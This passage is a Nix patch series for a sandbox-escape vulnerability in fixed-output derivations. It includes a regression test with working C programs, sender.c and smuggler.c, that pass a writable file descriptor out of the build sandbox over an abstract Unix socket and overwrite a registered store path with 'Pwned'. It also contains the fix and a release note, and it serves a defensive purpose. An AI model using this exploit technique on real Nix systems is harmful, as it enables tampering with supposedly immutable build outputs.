sandbox and modify the path after it has been -registered. - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - flake.nix | 2 + - tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++ - tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ - tests/nixos/ca-fd-leak/smuggler.c | 66 ++++++++++++++++++++++ - 4 files changed, 223 insertions(+) - create mode 100644 tests/nixos/ca-fd-leak/default.nix - create mode 100644 tests/nixos/ca-fd-leak/sender.c - create mode 100644 tests/nixos/ca-fd-leak/smuggler.c - -diff --git a/flake.nix b/flake.nix -index 230bb6031..4a54c660f 100644 ---- a/flake.nix -+++ b/flake.nix -@@ -634,6 +634,8 @@ - ["i686-linux" "x86_64-linux"] - (system: runNixOSTestFor system ./tests/nixos/setuid.nix); - -+ tests.ca-fd-leak = runNixOSTestFor "x86_64-linux" ./tests/nixos/ca-fd-leak; -+ - - # Make sure that nix-env still produces the exact same result - # on a particular version of Nixpkgs. -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -new file mode 100644 -index 000000000..a6ae72adc ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -0,0 +1,90 @@ -+# Nix is a sandboxed build system. But Not everything can be handled inside its -+# sandbox: Network access is normally blocked off, but to download sources, a -+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". -+# The detail here is not important, but in our case it means that the hash of -+# the output has to be known beforehand. And if you know that, you get a few -+# rights: you no longer run inside a special network namespace! -+# -+# Now, Linux has a special feature, that not many other unices do: Abstract -+# unix domain sockets! Not only that, but those are namespaced using the -+# network namespace! That means that we have a way to create sockets that are -+# available in every single fixed-output derivation, and also all processes -+# running on the host machine! Now, this wouldn't be that much of an issue, as, -+# well, the whole idea is that the output is pure, and all processes in the -+# sandbox are killed before finalizing the output. What if we didn't need those -+# processes at all? Unix domain sockets have a semi-known trick: you can pass -+# file descriptors around! -+# This makes it possible to exfiltrate a file-descriptor with write access to -+# $out outside of the sandbox. And that file-descriptor can be used to modify -+# the contents of the store path after it has been registered. -+ -+{ config, ... }: -+ -+let -+ pkgs = config.nodes.machine.nixpkgs.pkgs; -+ -+ # Simple C program that sends a a file descriptor to `$out` to a Unix -+ # domain socket. -+ # Compiled statically so that we can easily send it to the VM and use it -+ # inside the build sandbox. -+ sender = pkgs.runCommandWith { -+ name = "sender"; -+ stdenv = pkgs.pkgsStatic.stdenv; -+ } '' -+ $CC -static -o $out ${./sender.c} -+ ''; -+ -+ # Okay, so we have a file descriptor shipped out of the FOD now. But the -+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor -+ # lives in a mount namespace where it is not! So even when this file exists -+ # in the actual Nix store, we're capable of just modifying its contents... -+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); -+ -+ # The abstract socket path used to exfiltrate the file descriptor -+ socketName = "FODSandboxExfiltrationSocket"; -+in -+{ -+ name = "ca-fd-leak"; -+ -+ nodes.machine = -+ { config, lib, pkgs, ... }: -+ { virtualisation.writableStore = true; -+ nix.settings.substituters = lib.mkForce [ ]; -+ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; -+ }; -+ -+ testScript = { nodes }: '' -+ start_all() -+ -+ machine.succeed("echo hello") -+ # Start the smuggler server -+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") -+ -+ # Build the smuggled derivation. -+ # This will connect to the smuggler server and send it the file descriptor -+ machine.succeed(r""" -+ nix-build -E ' -+ builtins.derivation { -+ name = "smuggled"; -+ system = builtins.currentSystem; -+ # look ma, no tricks! -+ outputHashMode = "flat"; -+ outputHashAlgo = "sha256"; -+ outputHash = builtins.hashString "sha256" "hello, world\n"; -+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; -+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; -+ }' -+ """.strip()) -+ -+ -+ # Tell the smuggler server that we're done -+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") -+ -+ # Check that the file was not modified -+ machine.succeed(r""" -+ cat ./result -+ test "$(cat ./result)" = "hello, world" -+ """.strip()) -+ ''; -+ -+} -diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c -new file mode 100644 -index 000000000..75e54fc8f ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/sender.c -@@ -0,0 +1,65 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <fcntl.h> -+#include <errno.h> -+#include <string.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Set up a abstract domain socket path to connect to. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ -+ // Now try to connect, To ensure we work no matter what order we are -+ // executed in, just busyloop here. -+ int res = -1; -+ while (res < 0) { -+ res = connect(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0 && errno != ECONNREFUSED) perror("connect"); -+ if (errno != ECONNREFUSED) break; -+ } -+ -+ // Write our message header. -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Write an SCM_RIGHTS message containing the output path. -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ hdr->cmsg_len = CMSG_LEN(sizeof(int)); -+ hdr->cmsg_level = SOL_SOCKET; -+ hdr->cmsg_type = SCM_RIGHTS; -+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); -+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); -+ -+ msg.msg_controllen = CMSG_SPACE(sizeof(int)); -+ -+ // Write a single null byte too. -+ msg.msg_iov = malloc(sizeof(struct iovec)); -+ msg.msg_iov[0].iov_base = ""; -+ msg.msg_iov[0].iov_len = 1; -+ msg.msg_iovlen = 1; -+ -+ // Send it to the othher side of this connection. -+ res = sendmsg(sock, &msg, 0); -+ if (res < 0) perror("sendmsg"); -+ int buf; -+ -+ // Wait for the server to close the socket, implying that it has -+ // received the commmand. -+ recv(sock, (void *)&buf, sizeof(int), 0); -+} -diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c -new file mode 100644 -index 000000000..82acf37e6 ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/smuggler.c -@@ -0,0 +1,66 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Bind to the socket. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ int res = bind(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0) perror("bind"); -+ -+ res = listen(sock, 1); -+ if (res < 0) perror("listen"); -+ -+ int smuggling_fd = -1; -+ -+ // Accept the connection a first time to receive the file descriptor. -+ fprintf(stderr, "%s\n", "Waiting for the first connection"); -+ int a = accept(sock, 0, 0); -+ if (a < 0) perror("accept"); -+ -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Receive the file descriptor as sent by the smuggler. -+ recvmsg(a, &msg, 0); -+ -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ while (hdr) { -+ if (hdr->cmsg_level == SOL_SOCKET -+ && hdr->cmsg_type == SCM_RIGHTS) { -+ -+ // Grab the copy of the file descriptor. -+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); -+ } -+ -+ hdr = CMSG_NXTHDR(&msg, hdr); -+ } -+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); -+ close(a); -+ -+ // Wait for a second connection, which will tell us that the build is -+ // done -+ a = accept(sock, 0, 0); -+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); -+ // Write a new content to the file -+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); -+ char * new_content = "Pwned\n"; -+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); -+ if (written_bytes != strlen(new_content)) perror("write"); -+} --- -2.42.0 - - -From 4bc5a3510fa3735798f9ed3a2a30a3ea7b32343a Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:45:39 -0500 -Subject: [PATCH 2/3] Copy the output of fixed-output derivations before - registering them - -It is possible to exfiltrate a file descriptor out of the build sandbox -of FODs, and use it to modify the store path after it has been -registered. -To avoid that issue, don't register the output of the build, but a copy -of it (that will be free of any leaked file descriptor). - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> -Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> ---- - src/libstore/build/local-derivation-goal.cc | 6 ++++++ - src/libutil/filesystem.cc | 6 ++++++ - src/libutil/util.hh | 7 +++++++ - 3 files changed, 19 insertions(+) - -diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc -index 64b55ca6a..f1e22f829 100644 ---- a/src/libstore/build/local-derivation-goal.cc -+++ b/src/libstore/build/local-derivation-goal.cc -@@ -2558,6 +2558,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() - [&](const DerivationOutput::CAFixed & dof) { - auto & wanted = dof.ca.hash; - -+ // Replace the output by a fresh copy of itself to make sure -+ // that there's no stale file descriptor pointing to it -+ Path tmpOutput = actualPath + ".tmp"; -+ copyFile(actualPath, tmpOutput, true); -+ renameFile(tmpOutput, actualPath); -+ - auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { - .method = dof.ca.method, - .hashType = wanted.type, -diff --git a/src/libutil/filesystem.cc b/src/libutil/filesystem.cc -index 11cc0c0e7..2a7787c0e 100644 ---- a/src/libutil/filesystem.cc -+++ b/src/libutil/filesystem.cc -@@ -133,6 +133,12 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete) - } - } - -+ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete) -+{ -+ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete); -+} -+ - void renameFile(const Path & oldName, const Path & newName) - { - fs::rename(oldName, newName); -diff --git a/src/libutil/util.hh b/src/libutil/util.hh -index b302d6f45..59d42e0a5 100644 ---- a/src/libutil/util.hh -+++ b/src/libutil/util.hh -@@ -274,6 +274,13 @@ void renameFile(const Path & src, const Path & dst); - */ - void moveFile(const Path & src, const Path & dst); - -+/** -+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is -+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but -+ * with the guaranty that the destination will be βfreshβ, with no stale inode -+ * or file descriptor pointing to it). -+ */ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete); - - /** - * Wrappers arount read()/write() that read/write exactly the --- -2.42.0 - - -From 9e7065bef5469b3024cde2bbc7745530a64fde5b Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 04:01:23 -0500 -Subject: [PATCH 3/3] Add release notes - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - doc/manual/src/release-notes/rl-next.md | 8 ++++++++ - 1 file changed, 8 insertions(+) - -diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md -index c869b5e2f..f77513385 100644 ---- a/doc/manual/src/release-notes/rl-next.md -+++ b/doc/manual/src/release-notes/rl-next.md -@@ -1 +1,9 @@ - # Release X.Y (202?-??-??) -+ -+- Fix a FOD sandbox escape: -+ Cooperating Nix derivations could send file descriptors to files in the Nix -+ store to each other via Unix domain sockets in the abstract namespace. This -+ allowed one derivation to modify the output of the other derivation, after Nix -+ has registered the path as "valid" and immutable in the Nix database. -+ In particular, this allowed the output of fixed-output derivations to be -+ modified from their expected content. This isn't the case any more. --- -2.42.0 - |